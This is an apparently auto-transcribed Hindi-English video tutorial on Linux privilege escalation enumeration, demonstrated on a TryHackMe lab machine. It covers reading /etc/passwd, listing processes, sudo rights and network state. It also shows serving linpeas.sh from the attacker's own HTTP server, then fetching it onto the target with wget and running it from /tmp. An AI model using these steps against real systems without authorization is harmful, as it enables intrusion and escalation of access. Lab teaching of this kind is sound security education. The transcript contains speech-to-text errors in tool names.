Hey guys, welcome back to my channel Fantastic और without wasting any time, we'll start about the privilege escalation. So privilege escalation के बारे में सारी चीज़ें देखेंगे हम लोग कि privilege escalation होता क्या है, उसका एनिमरेशन क्या है, कौन कौन से ऑटोमेटेड एनिमरेशन टूल्स है आपके privilege escalation के लिए, कर्नल एक्सप्लोइटेशन क्या है, sudo suid, आप cron jobs, आपके path है, nfs, इन सब के बारे में देखेंगे. So almost लाइक 10 वीडियोस के समथिंग आएगा जिसके अंदर हम ट्राई मी की एक मशीन सोल्व करके देखेंगे जिसमें प्रिविलेज एस्केलेशन होता क्या है लिनक्स से रिलेटेड, जो इसमें अपन डिस्कस करने वाले हैं. सो स्टार्ट करते हैं. सो प्रिविलेज एस्केलेशन सिंपली आपका होता है कि आप किसी भी लाइक वल्नरेबिलिटी के थ्रू, किसी भी डिजाइन फ्लो के थ्रू, किसी भी कॉन्फ़िगरेशन लाइक मिस कॉन्फ़िगरेशन के थ्रू, अगर आप लोअर परमिशन से आप हायर यूजर की परमिशन पे आ जाते हैं, सो विच इज आपका प्रिविलेज एस्केलेशन. अब वो आपके परमिशंस हो सकता है हॉरिजॉन्टली भी हो सकता है वर्टिकल भी हो, बट आज के इस मतलब पूरी सीरीज के अंदर हम लोग देखने वाले हैं कि नॉर्मल यूजर के थ्रू आप कैसे हायर यूजर के लेवल की परमिशन ले सकते हैं. फॉर एग्जांपल अगर मैं अभी लिनक्स के बारे में देखता हूँ, सो लिनक्स मेरा सिंपली नॉर्मल यूजर के साथ आता है, बट अगर आपको रूट यूजर चेक करना हो तो आप रूट यूजर के थ्रू कैसे का एक्सेस लोगे, विच इज आपका प्रिविलेज एस्केलेशन. नाउ इम्पोर्टेंट क्यों है आपका प्रिविलेज एस्केलेशन मल्टीपल सीटीएफ्स के लिए. सो हो सकता है आपके रीसेटिंग पासवर्ड के लिए, आपके बाईपास एक्सेस कंट्रोल के लिए, सॉफ्टवेयर कॉन्फ़िगरेशन एडिट करने के लिए, आपके रेजिस्टेंस को इनेबल करने के लिए, या फिर जो भी आपके प्रिविलेज है जो एग्जिस्टिंग यूजर से आप उसको चेंज करना चाहते हो लाइक हायर यूजर के अंदर, सो उसके लिए आप उसे एग्जीक्यूट करवाना चाहते हो एज ए एडमिनिस्ट्रेटिव कमांड, एज ए रूट कमांड, एज ए sudo कमांड, तो उसके लिए आपके प्रिविलेज एस्केलेशन काम में आता है. नाउ एनिमेशन के लिए मल्टीपल कमांड्स काम में आती है. सो फर्स्ट ऑफ ऑल है आपका होस्ट नेम. सो होस्ट नेम आपके यूज में आता है कि आप टारगेट मशीन के नाम वगैरह आइडेंटिफाई कर सको. सो जैसे मैं भी यहाँ पे चेक कर रहा हूँ होस्ट नेम, सो यहाँ पे वाडे 7363 आ रहा है. बहुत बार आप चेक करोगे तो हो सकता है आपके ubuntu लिखा हुआ है, या फिर हो सकता है जो भी सर्विसेज होती है जो सिस्टम रोल होता है उससे रिलेटेड आपके नाम लिखे हुए आते हैं, लाइक एसक्यूएल आपके प्रोडक्शन सर्वर से हो गया तो SQL लिखा हुआ आ गया आपके, या फिर कुछ डेटाबेस मेंटेन कर रहे हो उससे रिलेटेड आ गया आपके, मल्टीपल एप्लीकेशन से रिलेटेड आ गया. सो यू कैन यूज द होस्ट नेम जिससे आप आइडेंटिफाई कर सके कि अभी उसका होस्ट क्या है. देन सेकंड कमांड इज यूनेम. सो यूनेम आपकी प्रिंट करती है आपकी इंफॉर्मेशन जो कि कर्नल से रिलेटेड आपकी इंफॉर्मेशन होती है. सो यूनेम करके अगर मैं हाइफन ए करता हूँ, सो सिंपली आप यहाँ से कर्नल के वर्जन की डिटेल्स निकाल सकते हो. उस कर्नल के रिलेटेड आप एक्सप्लोइट सर्च कर सकते हैं मार्केट में एक्सप्लोइट हाइफन डीबी पे या फिर मेटा एक्सप्लोइट पे, जहाँ से आपको वर्जन आइडेंटिफाई हो जाता है. सो दैट इज यूनेम हाइफन ए. नाउ नेक्स्ट कमांड इज प्रोक एंड वर्जन. सो इसको मैं सिंपली सॉरी मैं इसको सिंपली कैट कर लेता हूँ, कैट प्रोक एंड देन वर्जन. सो यहाँ पे मैं जैसे एंटर करता हूँ, सो मेरे पास कुछ एक इन्फॉर्मेशन आती है. प्रोक वर्जन आपके लाइक ये भी है आपके सिस्टम के रिलेटेड, आपके कर्नल के इन्फॉर्मेशन के ही काम में आता है जो भी आपका टारगेट कंप्यूटर सिस्टम्स है. डिफरेंट डिफरेंट आपके लिनक्स ऑपरेटिंग सिस्टम के अंदर आते हैं ये, जो कि आपके लिनक्स वर्जन के मतलब सॉरी कर्नल वर्जन के साथ साथ जो भी प्रोग्राम इंस्टॉल्ड है जिसके थ्रू आप कुछ एक्सप्लोइटेशन कर सकते हैं, जैसे कंपाइलर हो गया आपके सी का. सो फॉर एग्जांपल जैसे मैंने यहाँ पे कैट प्रोक वर्जन लिखा तो मुझे यहाँ पे पता लगता है कि यहाँ पे जीसीसी वर्जन 4.8.2 यहाँ पे मेरा इंस्टॉल्ड है. दैट्स मीन अगर मैं कुछ सी प्रोग्राम से रिलेटेड कुछ भी एक्सप्लोइट रन करता हूँ, सो मेरे पास यहाँ पे सिस्टम में जीसीसी इंस्टॉल्ड है. सो मैं जीसीसी के थ्रू यहाँ पे कंपाइल कर सकता हूँ. सो इसके लिए आप कैट कर सकते हो प्रोक वर्जन को. नाउ कैट एटीसी इशू. यहाँ पे आपको सिस्टम के बारे में ही इंफॉर्मेशन मिलती है, बट लाइक अगेन इसको भी मॉडिफाई किया जा सकता है, इसको भी चेंजेस किया जा सकता है. बट यस एनिमेशन के टाइम पे आप एटीसी इशू फाइल्स भी देख सकते हैं जो कि ऑपरेटिंग सिस्टम से रिलेटेड आपको इंफॉर्मेशन रिवील करती है. सो द नेक्स्ट कमांड इज पीएस. सो पीएस है आपका फॉर प्रोसेस स्टेटस.
सो प्रोसेस स्टेटस के अंदर आपको बताता है PID, TTY, टाइम एंड CMD। सो PID स्टैंड्स फॉर प्रोसेस ID एंड TTY आपको बताता है जो भी यूजर टर्मिनल टाइप यूज में ले रहा है, एंड देन टाइम नॉर्मली, एंड देन CMD। बट ये जो टाइम और CMD है, ये आपके ऑब्वियसली लाइक अगर मैं टाइम से रिलेटेड बात करूं, सो प्रोसेस जो रन हो रही है उससे रिलेटेड टाइम नहीं है डायरेक्टली, और जो CMD आपको शो कर रहा है लाइक SH एंड PS, which is like not display any command line parameter. So this is the simple PS command. अब PS command के अंदर आप मल्टीपल यूजर्स देख सकते हैं कि अभी कौन कौन सी रनिंग प्रोसेस है। सो मैं यूज ले रहा हूँ PS-A। सो यहाँ पे मुझे ऑल प्रोसेस शो करता है कि जो जो भी मेरे पास प्रोसेस रनिंग के अंदर है। और अगर आपको उससे रिलेटेड आपको पूरे ट्री स्ट्रक्चर के अंदर देखना है, सो ट्री स्ट्रक्चर के लिए मैं यहाँ पे लिखता हूँ PS एंड देन AXJF। सो PS-AXJF। सो XJF होता है आपका, A स्टैंड्स फॉर ऑल प्रोसेसेस, X स्टैंड्स फॉर BST स्टाइल जहाँ पे आपके TTY मस्ट होना चाहिए, देन J फॉर जो आपका BST जॉब कंट्रोल फॉर्मेट के लिए, एंड F है आपका फुल फॉर्मेट लिस्टिंग के लिए। सो यहाँ पे मैंने PS-XJF किया जहाँ पे आपको मल्टीपल प्रोसेस यूज में आती है, जो हम लोग आगे एक्सप्लोटेशंस के टाइम पे मैं आपको बताता हूँ कि कौन सी इन्फॉर्मेशन किस चीज के लिए है, बट एनिमेशन के लिए आप PS-XJF यहाँ पे डायरेक्टली यूज में ले सकते हो। या फिर मैं अगर PS की ओर बात, सो नेक्स्ट है अपना PS-OX। सो PS-OX में AUX आप एडिशनल यूज में ले रहे हैं। सो ए आपके सभी प्रोसेस आपको शो करेगा जितने भी आपके यूजर्स हैं, एंड देन यू आ जाता है विच इज डिस्प्ले द यूजर दैट लॉन्च द प्रोसेस, एंड देन आपके एक्स आता है। सो एक्स आपके प्रोसेस आपके शो करता है विच आर नॉट अटैच टू ए टर्मिनल। सो ऐसे करके हम एक साथ AUX यूज में ले रहे हैं। सो अभी भी जो ये इन्फॉर्मेशन आएगी, हाँ, ये हम आगे वाले पार्ट में देखेंगे जब हम देखेंगे कि सिस्टम से या फिर इनसे रिलेटेड वर्नेबिलिटीज क्या क्या है। सो उस टाइम में हमारे पास ऑक्स आएगा, और उस टाइम पे आप रियल टाइम के अंदर समझ पाएंगे कि PS और ऑक्स क्यों यूज में लेते हैं। जैसे यहाँ पे हमें पाथ मिल रहा है, जहाँ पे रैपर से रिलेटेड हमें इंफॉर्मेशन है, यूजर बिन डिबस डेमन से रिलेटेड जहाँ पे कुछ कॉन्फ़िगरेशन की फाइल है accessibility.c। सो मल्टीपल टाइप के आपके पास यहाँ पे आप एनिमेट कर सकते हो यूजर्स। सो इन कंक्लूजन, जब भी आप PS कमांड यूज में लेते हो विच इज द प्रोसेस स्टेटस, जहाँ पे आप PID, TTY और आपके टाइम CMD के बेसिस पे आप मल्टीपल इंफॉर्मेशन गेन कर सकते हैं। आप जितने भी प्रोसेस है वो सारी एक साथ चेक कर सकते हैं, सभी यूजर्स की सभी प्रोसेस, जो कि अलग अलग प्रोसेस जैसे जिस यूजर ने लॉन्च की है वो यहाँ पे आपको सीधा शो हो जाती है। नाउ नेक्स्ट कमांड देखते हैं अब env। सो env आपके इन्वायरमेंट वेरिएबल्स होते हैं। सो मैं यहाँ पे सिंपल env करके एंटर कर देता हूँ। env करने के बाद यहाँ पे आपको इन्वायरमेंटली जो भी आपके पास इंफॉर्मेशन होगी, सो जैसे विंडोज में आपने देखा होगा जब भी आप पाइथन वगैरह इंस्टॉल करते हैं तो यहाँ पे आप पाइथन की पाथ वगैरह सेटअप करते हैं, या जावा वगैरह इंस्टॉल करते हैं तो पाथ सेटअप करते हैं। सो इन्वायरमेंट जो ये कमांड है ये आपको उनके बारे में आपको इन्फॉर्मेशन देता है जो भी इन्वायरमेंटल वेरिएबल्स है। सो आप इस टाइप से देख सकते हैं कि पाइथन वगैरह इंस्टॉल्ड है या नहीं, किस पाथ पे आपकी चीज़ें चल रही है। जैसे अगर मैं सिंपली इंफॉर्मेशन की बात करूँ, सो जैसे मुझे यहाँ पे ZSH शो हो रहा है जैसे शेल। सो यहाँ पे मेरा एक ZSH रन हो रहा है, और मैं अगर सिंपल देखूँ पाथ की तो यूजर लोकल एस बिन, यूजर लोकल बिन, यूजर एस बिन, यूजर गेम्स। तो यहाँ पे मेरे पास मल्टीपल चीजें हैं इंफॉर्मेशन निकालने के लिए, एनिमेशन करने के लिए। सो ये आप इन्वायरमेंट या फिर env कमांड के थ्रू ये आप इंफॉर्मेशन देख सकते हैं। सिस्टम एडमिनिस्ट्रेटर कई बार कुछ परमिशंस के लिए कुछ कमांड्स को अलाउ करते हैं कुछ यूजर्स के लिए, जिसमें आप रूट प्रिविलेज के साथ इंफॉर्मेशन देख सकते हैं। सो sudo -l की हेल्प से आप वो सारी कमांड्स देख सकते हैं, जैसे कि एंड देन कारण का पासवर्ड जो भी आपका नॉर्मल यूजर है। सो यहाँ पे मेरे पास ये आ रहा है कि ऐसी कोई सी इंफॉर्मेशन नहीं है या ऐसी कोई सी कमांड नहीं है जिसके अंदर मेरे पास ये चीजें आ रही है। एंड अगेन बेसिक कमांड इज ls। सो ls आप लोगों ने बहुत बार यूज में लिया भी होगा।
सो एलएस आपको इन्फॉर्मेशन देता है लिस्टिंग के लिए कि अभी डायरेक्टरी में क्या क्या है। सो जब भी आप एनिमरेट करते हैं तो आपको हर एक डायरेक्टरी में जाके चेक करना होता है। सो सिंपल अगर आप एलएस करके चेक करते हैं तो यहाँ पे आपको डायरेक्टरी दिखाता है, बट व्हेन यू यूज एलएस हाइफन एल ए मीन आपको लिस्ट करके शो करेगा कि मुझे ऑल फाइल्स दिखाए विद द हेल्प ऑफ परमिशंस। तो यहाँ पे आपको परमिशंस के साथ आपको हिडन फाइल्स भी दिखाएगा जो कि डॉट के साथ होती है। जैसे अभी यहाँ पे कुछ भी आपकी हिडन फाइल्स नहीं है। सो फॉर एग्जांपल जैसे मैं सी डी करके एंड होम एलएस, सो यहाँ पे मैट एंड देन सी डी मैट क्लियर कर लेते हैं एक बार, देन एलएस। सो एलएस में मुझे डेस्कटॉप डॉक्यूमेंट्स डाउनलोड से सारी चीज़ें दिखा रहा है, बट मैं एलएस हाइफन एल ए करके देखता हूँ यहाँ पे। सो मुझे पता लगता है कि यहाँ पे मल्टीपल हिडन फोल्डर्स भी है, लाइक डॉट डी एम आर सी करके यहाँ पे एक फाइल है। और डायरेक्टरी के अंदर ये आपका डायरेक्टरी है जो कि मुझे शो कर रहा है कि लाइक डी। सो डायरेक्टरी में डॉट लोकल करके मुझे यहाँ पे शो कर रहा है, जहाँ पे आपके स्टार्टिंग के अंदर हाइफन आ रहा है दैट्स मीन वो आपकी एक फाइल है। एंड जहाँ पे आपके डी आ रहा है विच इंडिकेट्स दैट फोल्डर मीन डायरेक्टरी। सो ऐसे करके आप एल एस हाइफन एल ए की हेल्प से ये सारी इंफॉर्मेशन देख सकते हैं। और जब भी आप लोग किसी मशीन के अंदर एंटर करते हैं, सो एंटर करने पे यूज़र किस प्रिविलेज के साथ है उसके लिए आप कमांड यूज़ में लेते हैं आईडी। सो मैं आईडी करके एंटर करता हूँ। सो यहाँ पे मुझे बताता है यू आई डी 1001 कैरन, जी आई डी 1001 एंड ग्रुप्स 1001 कैरन करके। सो नॉर्मल लिनक्स ऑपरेटिंग सिस्टम में सारी आईडी 1000 से स्टार्ट होती है, जो कि आपको बताता है कि आप नॉर्मल यूज़र है। नाउ अगर मैं यहाँ पे देखना चाहता हूँ कि टोटल यूजर्स और रूट वगैरह कितने हैं, सो मैं यहाँ पे करता हूँ केट ईटीसी एंड पासवर्ड। नाउ केट ईटीसी पासवर्ड में करता हूँ। सो रूट के अंदर मुझे यहाँ पे दिखाता है लाइक x00 रूट एंड बिन बैश। और मैं सिंपली स्क्रॉल करता हूँ। सो स्क्रॉल करने पे मुझे यहाँ पे यूजर्स दिखाता है मैट कैरन। सो जैसे मैं अभी कैरन के एसएसएच से लॉगिन हूँ दैट्स वाई। मैट अभी हमने देखा ही होम यूजर के अंदर। सो सिंपली मैं अगर इससे फिल्टर आउट करना चाहूँ कि जितने भी यूजर्स है वो मुझे सभी शो करें, सो सिंपल गेट ईटीसी पासवर्ड एंड पासवर्ड एंड देन पाइप साइन के साथ मैं यहाँ पे करता हूँ कट हाइफन डी। एंड देन मेरा जो भी कोलन के बाद का है वो सारी चीज़ें हट जाएगी। एंड देन हाइफन F1। सो यहाँ पे अब मेरे पास सारे के सारे यूजर्स शो कर देंगे। सो ये बट याद रखना है ये सारे वो यूजर्स है जो अलग अलग सर्विसेज पे यहाँ पे आपके रनिंग में है। बट हम जो टारगेट कर रहे होते हैं वो होम यूजर से रिलेटेड कर रहे होते हैं। सो यहाँ पे आप ग्रेप कमांड यूज में ले सकते हैं। सो फॉर एग्जांपल मैं अगर यहाँ पे लिखता हूँ कैट etc पासवर्ड एंड देन ग्रेप एंड देन होम और एंटर करता हूँ। सो यहाँ पे मुझे कुछ एक मेन फिल्टर दिखाता है कि एक तो मेरे पास सिस्टम लॉग से रिलेटेड मेन होम सिस लॉग बिन फोल्ड्स यूएसबी मक्स करके होम यूएसबी मक्स देन मैट एंड कैरन, जिसमें मुझे दिखाता है होम मैट एंड होम कैरन करके। सो एंड जैसे मैं एक बार और आपको गेट एटीसी पासवर्ड। सो फॉर एग्जाम्पल अब आपको फिल्टर आउट करना है कि एक्चुअल यूजर्स कितने हैं। सो यहाँ पे आप ग्रैब कर सकते हैं बिन बैश करके। मीन फॉर एग्जाम्पल जैसे कि मैं यहाँ पे लिखता हूँ get hyphen etc hyphen password then pipe sign then grep bin bash and then enter। सो यहाँ पे मुझे यूजर्स दिखाता है रूट और मेट करके, जहाँ पे मैं बैश का एक्सेस ले सकता हूँ इन यूजर्स पे। नाउ एनिमेशन के टाइम पे जब भी आपको कुछ मशीन मिलती है, सो यूजफुल कमांड में से एक और आती है विच इज हिस्ट्री, जो कि आपको बताती है कि अगर कुछ चेंजेस हुए हैं यहाँ पे सो आप इजीली आइडेंटिफाई कर सकते हैं। सो यू कैन यूज हिस्ट्री। मैं आपको दूसरे टर्मिनल के अंदर मेरे ही सिस्टम का बता देता हूँ जैसे हिस्ट्री। सो यहाँ पे जैसे मेरे पास हिस्ट्री के अंदर आ गया कि हाँ मैंने जॉन यूज में लिया है फॉर क्रेकिंग द पासवर्ड एंड ऑल, हैश आइडेंटिफायर मैंने यूज लिया है क्लियर,
ओलम्पस करके मैंने एक CTF किया था, उससे रिलेटेड तो जो भी इंफॉर्मेशन है मुझे यहाँ पे हिस्ट्री कमांड के अंदर यहाँ पे शो हो जाती है। नाउ नेक्स्ट इंफॉर्मेशन होता है, आपकी कमांड है यूजफुल विच इज IF कॉन्फ़िग। सो IF कॉन्फ़िग के अंदर आपको जो डिटेल्स वगैरह मिलती है वो मिलती है आपको इंटरफेसेस से रिलेटेड, लाइक आपके ईथरनेट जीरो और आपके लोकल इंटरफेस दोनों आपके कनेक्टेड है। सो आप इंटरफेसेस आइडेंटिफाई कर सकते हैं। फॉर एग्जांपल जैसे मैं अगर मेरे सिस्टम पे करता हूँ, सो IF कॉन्फ़िग। सो IF कॉन्फ़िग में मुझे बताता है कि ईथरनेट कनेक्टेड है, जो मेरा लूपबैक IP है वो कनेक्टेड है, टनल में मैं किसी VPN से कनेक्ट हूँ। सो VPN की जो IP है विच इज 10.17.51.213, ईथरनेट से जो मेरे पास जो IP असाइंड हुई है जो कि मेरे को VMware ने असाइन की है विच इज 192.168.231.130, और लूप बैक IP ऑब्वियसली 127.0.0.1। सो ऐसे करके आप अलग अलग इंटरफेस से आइडेंटिफाई कर सकते हो कि आपको किस इंटरफेस की चाहिए, क्योंकि रिवर्स कनेक्शन के लिए आप जैसे आपको आपकी ही IP डालनी होती है। सो उसके लिए आप टनल IP यूज लेते हैं, क्योंकि अभी VPN ने मुझे ये वाली IP असाइन कर रखी है। और अगर आप बिना VPN के कर रहे होते हैं, सो ऑब्वियसली आप इथरनेट की या फिर वाईफाई जो भी आपका इंटरफेस कनेक्टेड है उसकी आप IPs पिक कर लेते हैं। नाउ इसी से रिलेटेड एक यूजफुल कमांड है विच इज IP रूट, जो कि आपको पूरा पाथ बताता है कि कहाँ से होते हुए आपकी इंफॉर्मेशन जा रही है। सो डिफॉल्ट वाया 192.168.230, देन डेव ईथरनेट से जाके यहाँ पे आपके DHCP सोर्स से यार ये इन्फॉर्मेशन। सो अभी ये इन्फॉर्मेशन मेरी शो कर रहा है क्योंकि मैं अभी VMware से कनेक्ट हूँ। टारगेट मशीन के अंदर हम लोग करके देखते हैं IP रूट। सो IP रूट के अंदर बताता है कि डिफॉल्ट वाया 10.10.0.1 से आ रहा है, एंड देन जो सबनेट है विच इज 16 प्रोटोकॉल कर्नल स्कोप लिंक SRC, एंड यहाँ पे कुछ एक IP एंड स्कोप लिंक मैट्रिक, जो कि आपके नेटवर्क के रूट्स जो जो एग्जिस्ट करती है आपको यहाँ पे शो कर देती है। नेक्स्ट कमांड की ओर मूव ऑन करते हैं विच इज नेट स्टेट, जो कि आपके कौन कौन से आपके IPs पे कौन कौन से पोर्ट्स आपके वर्क है, उन पे क्या क्या सर्विसेज चल रही है, वो आपके नेट स्टेट बताता है। सो नेट स्टेट करके मैं सिंपली यहाँ पे एंटर करता हूँ। सो मुझे नेटवर्क का स्टेटस बताता है। स्क्रॉल करके सबसे ऊपर आ जाते हैं हम लोग। सो एक्टिव इंटरनेट कनेक्शंस, जहाँ पे मुझे प्रोटोकॉल्स, फ्लेक्स टाइप, स्टेट कनेक्टेड, आई नोट और पाथ। फॉर एग्जांपल यहाँ पे मुझे पता लगता है कि सिस्टम बस सॉकेट यहाँ पे कनेक्टेड है, जिनके आई नोट्स वगैरह ये है। इनको ओवर फिल्टर आउट करने के लिए यहाँ पे लिसनिंग मोड अपन यूज में ले सकते हैं। सो मैं यहाँ पे लिसनिंग मोड करता हूँ, और सो फॉर एग्जांपल नेट स्टेट -L। सो यहाँ पे जो जो अभी लिसनिंग पे है वो मेरे यहाँ पे फिल्टर आउट होके यहाँ पे आ गए हैं। मेन जो जो पोर्ट अभी लिसन मेन कनेक्शंस के लिए ओपन है, जहाँ पे आप कनेक्शंस क्रिएट कर सकते हैं, ये लिसन पे है। मेन अगर आप इनको रिक्वेस्ट भेजते हैं तो रिक्वेस्ट भेजते ही ये इसको एक्सेप्ट करेंगे, और एक्सेप्ट करने के बाद आप एक कनेक्शन एस्टेब्लिश कर सकते हैं। सो इसके लिए आप -L यूज ले सकते हैं। अगर आपको सभी इंफॉर्मेशन शो करनी है सो यू कैन यूज नेट स्टेट -A, जहाँ पे आपको सारी प्रोसेस बता देगा कि कनेक्टेड कौन सा है आपका, एंड लिसनिंग मोड पे आपके कौन सी सर्विसेज है, अभी क्या क्या आपके रन के अंदर है। सो दिस इज द नेट स्टेट कमांड। सो नेट स्टेट के लिए आप बाय डिफॉल्ट जो रन कर सकते हैं विच इज नेट स्टेट -ANO, जिसमें मुझे ऑल सॉकेट्स दिखाएगा। मेन ए पूरा सॉकेट्स, एन होता है आपका आपके रिजोल्व को मतलब जो आपका नाम है उसको रिजोल्व नहीं करेगा, एंड देन -O जो आपको टाइमर शो करे, देन एंटर। सो यहाँ पे मेरे पास इंफॉर्मेशन आ जाती है नेट स्टेट के थ्रू। दिस वन। सो यहाँ पे मुझे कुछ एक इन्फॉर्मेशन मिलती है, जैसे मेरा लूप बैक IP 631 से कनेक्टेड है, जो कि लिसन पे ही है। यहाँ पे कनेक्शन एस्टेब्लिश्ड हो चुका है। कुछ इंटरनल पोर्ट्स कनेक्टेड है विच लूप बैक IP। सो यहाँ पे आप नेट स्टेट के थ्रू वाली इन्फॉर्मेशन निकाल सकते हैं। नाउ नेक्स्ट कमांड इज फाइंड, जो कि सबसे ज़्यादा यूज में आती है आपके प्रिविलेज एस्केलेशन के टाइम पर। नाउ कुछ भी चीज़ें आपको सर्च करना हो सो यू कैन यूज फाइंड। अब फाइंड के बाद आपको क्या चीज़ें सर्च करनी है,
सो फॉर एग्जांपल अगर आपको किसी नाम से रिलेटेड सर्च करना है, लाइक आपको डायरेक्ट फ्लैग की वैल्यू सर्च करनी है, सो आप वो यूज में, सो नेम के लिए, सो यहाँ पे फाइंड एंड डॉट करके मैं आगे कर देता हूँ नेम, एंड देन फॉर एग्जांपल फ्लैग वन डॉट टी एक्स टी एंटर करते हैं। सो यहाँ पे जैसे मुझे बताता है कि यहाँ पे आप चेक नहीं कर पाए, यहाँ पे नहीं कर पाए, मीन आपको यहाँ पे परमिशन डिनाइड है, मीन सूडो से रिलेटेड आपको इन्फॉर्मेशन चाहिए। नाउ अगर आपको स्पेसिफिक किसी फोल्डर के अंदर चेक करना है, सो यहाँ पे आप फिर से फाइंड लिखेंगे, एंड फाइंड लिखने के बाद मैं यहाँ पे करता हूँ स्लैश होम, कि मुझे अभी होम डायरेक्टरी में चाहिए, देन नेम। अब क्या नेम से करना है, फॉर एग्जाम्पल फ्लैग वन डॉट टी एक्स टी एंटर करते हैं। सो यहाँ पे अगेन मुझे परमिशन डिनाइड, बट यहाँ पे मुझे दिखा देता है कि होम के अंदर मैट फ्लैग वन डॉट टी एक्स टी यहाँ पे मेरे एग्जिस्ट करता है। सो यहाँ पे आप डायरेक्टली आइडेंटिफाई कर सकते हैं विद द हेल्प ऑफ नेम। अब अगर आपको फिल्टर आउट करना है टाइप से रिलेटेड, सो फाइंड स्लैश, मीन आप रूट के अंदर सर्च कर रहे हैं, हाइफन टाइप, देन डी, देन हाइफन नेम एंड कॉन्फ़िग। सो यहाँ पे जो कॉन्फ़िगरेशन से रिलेटेड फाइल्स है वो यहाँ पे आपके पास शो हो गई। तो यहाँ पे जैसे मेरे पास इंफॉर्मेशन आ गई, कुछ एक में परमिशन डिनाइड है, बट यहाँ पे मैं जैसे ये यूज ले सकता हूँ, फॉर एग्जाम्पल दिस वन, सो लिव फर्मवेयर एंड कार्ल 9170F, यहाँ पे मेरे पास एक कॉन्फ़िगरेशन फाइल यहाँ पे मुझे मिल गई है। ऐसे करके आपके पास n नंबर ऑफ फिल्टर्स है, जो कि मैं आपको डिस्क्रिप्शन के अंदर शेयर कर दूंगा। तो आप उन फिल्टर्स के थ्रू फाइंड कमांड को यूज में ले सकते हैं। सो ये थी बेसिक एनिमरेशन कमांड, जिसके थ्रू आप एनिमरेट कर सकते हैं मल्टीपल चीज़ों को, कि आपको कौन सी इंफॉर्मेशन चाहिए, मेन आपके प्रोसेस से रिलेटेड हो गया, आपके सॉकेट से रिलेटेड हो गया, आपकी आईपी से रिलेटेड हो गया, आपके इंटरफेस से रिलेटेड हो गया, आपकी परमिशंस में क्या क्या अलाउड है रूट यूजर उससे रिलेटेड हो गया, आपके एनवायरनमेंट पाथ हो गया। तो ये सभी चीज़ें आपके एनिमरेशंस के अंदर काउंट होती है। सो दिस इज द सिंपल एनिमरेशन पार्ट। मेरे पास लिनक्स सिस्टम में मैं अभी लॉगिन हूँ, और लॉगिन होने के बाद जैसे हम लोगों ने चेक करना है कि कोई वनरेबल कंपोनेंट तो नहीं है, मिसकॉन्फ़िगरेशंस तो नहीं है। सो उसी से रिलेटेड आपके पास मल्टीपल स्क्रिप्ट्स है आपके गिटहब पे अवेलेबल है, जिसको आपको एग्जीक्यूट करना होता है आपके टारगेट सिस्टम पे। सो वन ऑन वन करके देखते हैं, जिसमें से कुछ एक आप प्रैक्टिकल करके देखते हैं अभी। सो फर्स्ट है आपका लेनपीस, विच इज़ लिनक्स प्रिविलेज एस्केलेशन ऑसम स्क्रिप्ट्स। सो सेम चीज़ आपके विंडोज़ ऑपरेटिंग सिस्टम्स के लिए भी होती है, अगर आप विंडोज़ प्रिविलेज एस्केलेशन करते हैं तो। सो लिनपीस हो गया। लिनपीस जैसे ही आप अपलोड करते हैं, एग्जीक्यूट करते हैं, मल्टीपल स्क्रिप्ट से ट्राई करती है कि लाइक आपका कर्नल वर्जन एक्सप्लोटेबल है या नहीं है, अगर है तो कौन कौन से एक्सप्लोइट इसके अंदर रन हो सकते हैं। सो ये सारी जो इन्फॉर्मेशन आपको एक स्क्रिप्ट चलाने पे ही मिल जाती है। सो फर्स्ट ऑफ ऑल आपको आइडेंटिफाई करना होता है कि आप ये लिनपीस वाली फाइल अपलोड कर सकते हैं क्या। सो करने के लिए आप अपने सिस्टम पे सर्वर क्रिएट कर सकते हैं, अगर आप लोकल सर्वर पे कर रहे हैं तो। सो एक धीरे धीरे करके अपन पूरा ट्यूटोरियल देखते हैं इसका। सो लेनपीस के लिए मैं यहाँ पे इसको कॉपी कर लेता हूँ। सो यूआरएल कॉपी हो गया। नाउ टर्मिनल। नाउ मैं मेरे सिस्टम के अंदर, क्योंकि जो भी आपका टारगेट सिस्टम है, हो सकता है वहाँ पे आपको इंटरनेट एक्सेसिबिलिटी नहीं मिले। सो मैं इसको अभी मेरे सिस्टम के अंदर लॉगिन कर लेता हूँ। सो टाइप करके देन cd डाउनलोड्स एंड देन mkdir linkbase, cd linkbase and then wget, एंटर। सो यू कैन सी मेरे पास अभी linkbase.sh मेरे पास यहाँ पे फाइल आ चुकी है। अब मुझे मेरे सिस्टम, जो मेरे टारगेट सिस्टम है, मुझे उसके अंदर इसको ट्रांसफ़र करना है। सो इसके लिए मैं एक पाइथन का एक सर्वर क्रिएट कर लेता हूँ। सो यहाँ पे मैंने सर्वर क्रिएट किया है, सो पाइथन के थ्रू। सो http.server12345, सो इस पोर्ट नंबर पे आएगा, और जो मेरा आईपी एड्रेस मुझे असाइंड है, सो मैं IF config की हेल्प से मेरा आईपी एड्रेस देख सकता हूँ, विच इज़ 10.17.51.213। सो मैं इसको कॉपी कर लेता हूँ, एंड देन आपका जो पोर्ट नंबर है विच इज़ 12345,
और 1 2 3 4 5 के आगे स्लैश करके मैं linpis.sh करता हूँ। सो मेरे सिस्टम के अंदर यहाँ पे इसको रख सकता हूँ। सो जब भी आपको टारगेट सिस्टम मिलता है, सो आइडेंटिफाई करना है कि ऐसी कोई डायरेक्टरी है जहाँ पे आप फाइल क्रिएट कर सकते हैं, अपलोड कर सकते हैं, चेंजेस कर सकते हैं। सो मोस्टली आपको टेम्प के अंदर मिल ही जाता है। सो अगर मैं cd tmp करते हैं ls, ओके, सो भी मैं टेम्प फोल्डर के अंदर हूँ। टेस्टिंग करने के लिए आप यहाँ पे टच कमांड यूज में ले सकते हैं, लाइक सो मैं यहाँ पे फाइल क्रिएट कर सकता हूँ। दैट्स मीन मेरे पास यहाँ पे परमिशन है। नाउ इसके बाद में हमें करना है डब्ल्यू गेट http और जो भी आपका आईपी एड्रेस था, देन पोर्ट नंबर 1 2 3 4 5 एंड आपकी फाइल का नाम। सो हम लोगों ने क्या किया, एक लोकल सर्वर क्रिएट किया और लोकल सर्वर क्रिएट करके हमारी टारगेट मशीन के अंदर linpis.sh वाली फाइल को यहाँ पे अपलोड कर दिया। नाउ यू कैन सी linpis.sh। नाउ इसे एग्जीक्यूट करने के लिए परमिशन डिनाइड। सो यहाँ पे आपको इसको एग्जीक्यूटेबल के लिए परमिशन देनी है। सो लेट्स ट्राई कि अगर मैं इसको फुल परमिशन दे सकता हूँ क्या। ओके, ओके, सो हमारी स्क्रिप्ट अभी स्टार्ट हो गई है। स्टार्ट होने पे स्टार्टिंग में ही आपको दिखाता है कि अगर आप रेड येलो सेक्शन में आता है देन 95% है पी वेक्टर। अगर आपको रेड के अंदर दिखाता है सो यू शुड टेक अ लुक ऑन इट। लाइट जैन नंबर में आपको दिखाता है यूजर विद 